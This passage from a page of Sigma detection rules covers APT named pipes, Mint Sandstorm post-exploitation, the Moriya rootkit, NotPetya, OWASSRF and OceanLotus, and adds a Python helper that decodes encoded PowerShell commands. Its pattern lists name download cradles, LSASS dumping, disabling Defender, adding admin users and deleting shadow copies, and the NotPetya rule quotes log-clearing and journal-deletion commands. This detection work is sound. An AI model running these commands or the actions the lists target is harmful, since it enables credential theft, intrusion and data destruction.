- 'MD5=7FAEA2B01796B80D180399040BB69835'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Malicious Named Pipe Created
Detects the creation of a named pipe seen used by known APTs or malware.
view Sigma YAML
title: Malicious Named Pipe Created
id: fe3ac066-98bb-432a-b1e7-a5229cb39d4a
status: test
description: Detects the creation of a named pipe seen used by known APTs or malware.
references:
- https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/
- https://securelist.com/faq-the-projectsauron-apt/75533/
- https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
- https://www.us-cert.gov/ncas/alerts/TA17-117A
- https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
- https://thedfirreport.com/2020/06/21/snatch-ransomware/
- https://github.com/RiccardoAncarani/LiquidSnake
- https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity
- https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a
- https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf
- https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: Florian Roth (Nextron Systems), blueteam0ps, elhoim
date: 2017-11-06
modified: 2023-08-07
tags:
- attack.privilege-escalation
- attack.stealth
- attack.t1055
logsource:
product: windows
category: pipe_created
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
selection:
PipeName:
- '\46a676ab7f179e511e30dd2dc41bd388' # Project Sauron
- '\583da945-62af-10e8-4902-a8f205c72b2e' # SolarWinds SUNBURST malware
- '\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' # LiquidSnake
- '\9f81f59bc58452127884ce513865ed20' # Project Sauron
- '\adschemerpc' # Turla HyperStack
- '\ahexec' # Sofacy group malware
- '\AnonymousPipe' # Hidden Cobra Hoplight
- '\bc31a7' # Pacifier
- '\bc367' # Pacifier
- '\bizkaz' # Snatch Ransomware
- '\csexecsvc' # CSEXEC default
- '\dce_3d' # Qbot
- '\e710f28d59aa529d6792ca6ff0ca1b34' # Project Sauron
- '\gruntsvc' # Covenant default
- '\isapi_dg' # Uroburos Malware
- '\isapi_dg2' # Uroburos Malware
- '\isapi_http' # Uroburos Malware
- '\jaccdpqnvbrrxlaf' # PoshC2 default
- '\lsassw' # Wild Neutron APT malware
- '\NamePipe_MoreWindows' # Cloud Hopper - RedLeaves
- '\pcheap_reuse' # Pipe used by Equation Group malware
- '\Posh*' # PoshC2 default
- '\rpchlp_3' # Project Sauron
- '\sdlrpc' # Cobra Trojan
- '\svcctl' # Crackmapexec smbexec default
- '\testPipe' # Emissary Panda Hyperbro
- '\winsession' # Wild Neutron APT malware
# - '\status_*' # CS default https://github.com/SigmaHQ/sigma/issues/253
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Mint Sandstorm - AsperaFaspex Suspicious Process Execution
Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
view Sigma YAML
title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution
id: 91048c0d-5b81-4b85-a099-c9ee4fb87979
status: test
description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
references:
- https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
date: 2023-04-20
modified: 2025-10-19
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|contains|all:
- 'aspera'
- '\ruby'
selection_special_child_powershell_img:
Image|endswith:
- '\powershell.exe'
- '\powershell_ise.exe'
selection_special_child_powershell_cli:
- CommandLine|contains:
- ' echo '
- '-dumpmode'
- '-ssh'
- '.dmp'
- 'add-MpPreference'
- 'adscredentials'
- 'bitsadmin'
- 'certutil'
- 'csvhost.exe'
- 'DownloadFile'
- 'DownloadString'
- 'dsquery'
- 'ekern.exe'
- 'FromBase64String'
- 'iex '
- 'iex('
- 'Invoke-Expression'
- 'Invoke-WebRequest'
- 'localgroup administrators'
- 'o365accountconfiguration'
- 'samaccountname='
- 'set-MpPreference'
- 'svhost.exe'
- 'System.IO.Compression'
- 'System.IO.MemoryStream'
- 'usoprivate'
- 'usoshared'
- 'whoami'
- CommandLine|re:
- '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}'
- 'net\s+user'
- 'net\s+group'
- 'query\s+session'
selection_special_child_lsass_1:
CommandLine|contains: 'lsass'
selection_special_child_lsass_2:
CommandLine|contains:
- 'procdump'
- 'tasklist'
- 'findstr'
selection_child_wget:
Image|endswith: '\wget.exe'
CommandLine|contains: 'http'
selection_child_curl:
Image|endswith: '\curl.exe'
CommandLine|contains: 'http'
selection_child_script:
CommandLine|contains:
- 'E:jscript'
- 'e:vbscript'
selection_child_localgroup:
CommandLine|contains|all:
- 'localgroup Administrators'
- '/add'
selection_child_net:
CommandLine|contains: 'net' # Covers net1
CommandLine|contains|all:
- 'user'
- '/add'
selection_child_reg:
- CommandLine|contains|all:
- 'reg add'
- 'DisableAntiSpyware'
- '\Microsoft\Windows Defender'
- CommandLine|contains|all:
- 'reg add'
- 'DisableRestrictedAdmin'
- 'CurrentControlSet\Control\Lsa'
selection_child_wmic_1:
CommandLine|contains|all:
- 'wmic'
- 'process call create'
selection_child_wmic_2:
CommandLine|contains|all:
- 'wmic'
- 'delete'
- 'shadowcopy'
selection_child_vssadmin:
CommandLine|contains|all:
- 'vssadmin'
- 'delete'
- 'shadows'
selection_child_wbadmin:
CommandLine|contains|all:
- 'wbadmin'
- 'delete'
- 'catalog'
condition: selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Mint Sandstorm - ManageEngine Suspicious Process Execution
Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
view Sigma YAML
title: Mint Sandstorm - ManageEngine Suspicious Process Execution
id: 58d8341a-5849-44cd-8ac8-8b020413a31b
status: test
description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
references:
- https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
date: 2023-04-20
modified: 2025-10-19
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_parent_path:
ParentImage|contains:
- 'manageengine'
- 'ServiceDesk'
selection_parent_image:
ParentImage|contains: '\java'
selection_special_child_powershell_img:
Image|endswith:
- '\powershell.exe'
- '\powershell_ise.exe'
selection_special_child_powershell_cli:
- CommandLine|contains:
- ' echo '
- '-dumpmode'
- '-ssh'
- '.dmp'
- 'add-MpPreference'
- 'adscredentials'
- 'bitsadmin'
- 'certutil'
- 'csvhost.exe'
- 'DownloadFile'
- 'DownloadString'
- 'dsquery'
- 'ekern.exe'
- 'FromBase64String'
- 'iex '
- 'iex('
- 'Invoke-Expression'
- 'Invoke-WebRequest'
- 'localgroup administrators'
- 'o365accountconfiguration'
- 'samaccountname='
- 'set-MpPreference'
- 'svhost.exe'
- 'System.IO.Compression'
- 'System.IO.MemoryStream'
- 'usoprivate'
- 'usoshared'
- 'whoami'
- CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}'
- CommandLine|re: 'net\s+user'
- CommandLine|re: 'net\s+group'
- CommandLine|re: 'query\ssession'
selection_special_child_lsass_1:
CommandLine|contains: 'lsass'
selection_special_child_lsass_2:
CommandLine|contains:
- 'procdump'
- 'tasklist'
- 'findstr'
selection_child_wget:
Image|endswith: '\wget.exe'
CommandLine|contains: 'http'
selection_child_curl:
Image|endswith: '\curl.exe'
CommandLine|contains: 'http'
selection_child_script:
CommandLine|contains:
- 'E:jscript'
- 'e:vbscript'
selection_child_localgroup:
CommandLine|contains|all:
- 'localgroup Administrators'
- '/add'
selection_child_net:
CommandLine|contains: 'net' # Covers net1
CommandLine|contains|all:
- 'user'
- '/add'
selection_child_reg:
- CommandLine|contains|all:
- 'reg add'
- 'DisableAntiSpyware'
- '\Microsoft\Windows Defender'
- CommandLine|contains|all:
- 'reg add'
- 'DisableRestrictedAdmin'
- 'CurrentControlSet\Control\Lsa'
selection_child_wmic_1:
CommandLine|contains|all:
- 'wmic'
- 'process call create'
selection_child_wmic_2:
CommandLine|contains|all:
- 'wmic'
- 'delete'
- 'shadowcopy'
selection_child_vssadmin:
CommandLine|contains|all:
- 'vssadmin'
- 'delete'
- 'shadows'
selection_child_wbadmin:
CommandLine|contains|all:
- 'wbadmin'
- 'delete'
- 'catalog'
filter_main:
CommandLine|contains|all:
- 'download.microsoft.com'
- 'manageengine.com'
- 'msiexec'
condition: all of selection_parent_* and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*) and not filter_main
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
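Both Mint Sandstorm rules above carry the regular expression `[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}`, which fires on `-e`, `-enc` and caret-obfuscated spellings of PowerShell's `-EncodedCommand` followed by a Base64 run. The following is an added example, not code from this page or from the Sigma project: a Python function that applies that regex with a capture group added around the Base64 run, decodes the payload for triage (PowerShell expects Base64 over UTF-16LE), and demonstrates a caveat to check in the converted query. Sigma's `re` modifier is case-sensitive unless the rule writes `re|i`, so as written the pattern matches `-enc` and `-e^nc` but not the PascalCase `-EncodedCommand`, which PowerShell accepts just the same. The command lines below are constructed, not captured telemetry.

```python
import base64
import binascii
import re

# Added example, not part of this page or the Sigma project. The rule regex is
# reproduced verbatim except for the capture group around the Base64 run.
ENCODED_CMD_RE = r"[-/–][Ee^]{1,2}[ncodema^]*\s([A-Za-z0-9+/=]{15,})"


def find_encoded_command(command_line, ignore_case=False):
    """Return (fired, decoded_script).

    fired: whether the rule regex matches the command line. Sigma's 're' is
    case-sensitive unless written 're|i', so the default mirrors the rule.
    decoded_script: the -EncodedCommand payload (Base64 over UTF-16LE), or
    None when the regex fired but the run is not a valid encoded command.
    """
    flags = re.IGNORECASE if ignore_case else 0
    match = re.search(ENCODED_CMD_RE, command_line, flags)
    if match is None:
        return False, None
    try:
        return True, base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return True, None


def encode_command(script):
    """Encode a script the way 'powershell -EncodedCommand' expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed command lines, not captured telemetry.
SAMPLES = {
    "short switch": f"powershell.exe -nop -w hidden -enc {encode_command('whoami')}",
    "caret obfuscated": f"powershell.exe -e^nc {encode_command('net user')}",
    "pascal case": f"powershell.exe -EncodedCommand {encode_command('whoami')}",
    "benign script": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
}


def triage(samples=SAMPLES):
    """Run every sample through the rule regex as written and with re|i semantics."""
    return {
        label: {
            "as_written": find_encoded_command(cmd),
            "case_insensitive": find_encoded_command(cmd, ignore_case=True),
        }
        for label, cmd in samples.items()
    }


if __name__ == "__main__":
    for label, result in triage().items():
        print(label, result)
```

If the converted query must cover `-EncodedCommand` as typed by PowerShell's own help text, either the backend's regex flags need to be case-insensitive or the rule needs `re|i`; the `CommandLine|contains` values in the same selection (`FromBase64String`, `Invoke-Expression` and so on) remain case-insensitive either way.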
critical
Moriya Rootkit - System
Detects the use of the Moriya rootkit as described in Securelist's Operation TunnelSnake report
view Sigma YAML
title: Moriya Rootkit - System
id: 25b9c01c-350d-4b95-bed1-836d04a4f324
status: test
description: Detects the use of the Moriya rootkit as described in Securelist's Operation TunnelSnake report
references:
- https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
author: Bhabesh Raj
date: 2021-05-06
modified: 2022-11-29
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1543.003
logsource:
product: windows
service: system
detection:
selection:
Provider_Name: 'Service Control Manager'
EventID: 7045
ServiceName: ZzNetSvc
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moriya Rootkit File Created
Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in Securelist's Operation TunnelSnake report.
view Sigma YAML
title: Moriya Rootkit File Created
id: a1507d71-0b60-44f6-b17c-bf53220fdd88
related:
- id: 25b9c01c-350d-4b95-bed1-836d04a4f324
type: derived
status: test
description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in Securelist's Operation TunnelSnake report.
references:
- https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
author: Bhabesh Raj
date: 2021-05-06
modified: 2023-05-05
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1543.003
- detection.emerging-threats
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename: 'C:\Windows\System32\drivers\MoriyaStreamWatchmen.sys'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
NotPetya Ransomware Activity
Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows event logs are cleared using wevtutil
view Sigma YAML
title: NotPetya Ransomware Activity
id: 79aeeb41-8156-4fac-a0cd-076495ab82a1
status: test
description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
references:
    - https://securelist.com/schroedingers-petya/78870/
    - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100
author: Florian Roth (Nextron Systems), Tom Ueltschi
date: 2019-01-16
modified: 2022-12-15
tags:
    - attack.stealth
    - attack.defense-impairment
    - attack.t1218.011
    - attack.t1685.005
    - attack.credential-access
    - attack.t1003.001
    - car.2016-04-002
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_specific_pattern:
        CommandLine|contains:
            - 'wevtutil cl Application & fsutil usn deletejournal /D C:'
            - 'dllhost.dat %WINDIR%\ransoms'
    selection_rundll32:
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith:
            - '.dat,#1'
            - '.dat #1' # Sysmon removes comma
            - '.zip.dll",#1'
    selection_perfc_keyword:
        - '\perfc.dat'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: critical
critical
OWASSRF Exploitation Attempt Using Public POC - Proxy
Detects an exploitation attempt of the OWASSRF variant targeting Exchange servers using a publicly available POC. The request uses the OWA endpoint to reach the PowerShell backend endpoint.
title: OWASSRF Exploitation Attempt Using Public POC - Proxy
id: fdd7e904-7304-4616-a46a-e32f917c4be4
status: test
description: Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
references:
    - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
    - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
    - https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-22
tags:
    - attack.initial-access
    - attack.t1190
    - detection.emerging-threats
logsource:
    category: proxy
detection:
    selection:
        # Look for the header: X-OWA-ExplicitLogonUser: owa/[email protected]
        c-useragent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36'
        cs-method: 'POST'
        sc-status: 200
        c-uri|contains|all:
            - '/owa/mastermailbox'
            - '/powershell'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
OWASSRF Exploitation Attempt Using Public POC - Webserver
Detects an exploitation attempt of the OWASSRF variant targeting Exchange servers using a publicly available POC. The request uses the OWA endpoint to reach the PowerShell backend endpoint.
title: OWASSRF Exploitation Attempt Using Public POC - Webserver
id: 92d78c63-5a5c-4c40-9b60-463810ffb082
status: test
description: Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
references:
    - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
    - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
    - https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-22
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection:
        # Look for the header: X-OWA-ExplicitLogonUser: owa/[email protected]
        cs-user-agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36'
        cs-method: 'POST'
        sc-status: 200
        cs-uri-query|contains|all:
            - '/owa/mastermailbox'
            - '/powershell'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
OceanLotus Registry Activity
Detects registry keys created in OceanLotus (also known as APT32) attacks
title: OceanLotus Registry Activity
id: 4ac5fc44-a601-4c06-955b-309df8c4e9d4
status: test
description: Detects registry keys created in OceanLotus (also known as APT32) attacks
references:
    - https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/
    - https://github.com/eset/malware-ioc/tree/master/oceanlotus
author: megan201296, Jonhnathan Ribeiro
date: 2019-04-14
modified: 2023-09-28
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - detection.emerging-threats
logsource:
    category: registry_event
    product: windows
detection:
    selection_clsid:
        TargetObject|contains: '\SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model'
    selection_hkcu:
        TargetObject|contains:
            # HKCU\SOFTWARE\Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\
            - 'Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\'
            # HKCU\SOFTWARE\Classes\AppX3bbba44c6cae4d9695755183472171e2\
            - 'Classes\AppX3bbba44c6cae4d9695755183472171e2\'
            # HKCU\SOFTWARE\Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\
            - 'Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\'
            - 'Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model'
    selection_appx_1:
        TargetObject|contains: '\SOFTWARE\App\'
    selection_appx_2:
        TargetObject|contains:
            - 'AppXbf13d4ea2945444d8b13e2121cb6b663\'
            - 'AppX70162486c7554f7f80f481985d67586d\'
            - 'AppX37cc7fdccd644b4f85f4b22d5a3f105a\'
        TargetObject|endswith:
            - 'Application'
            - 'DefaultIcon'
    condition: selection_clsid or selection_hkcu or all of selection_appx_*
falsepositives:
    - Unknown
level: critical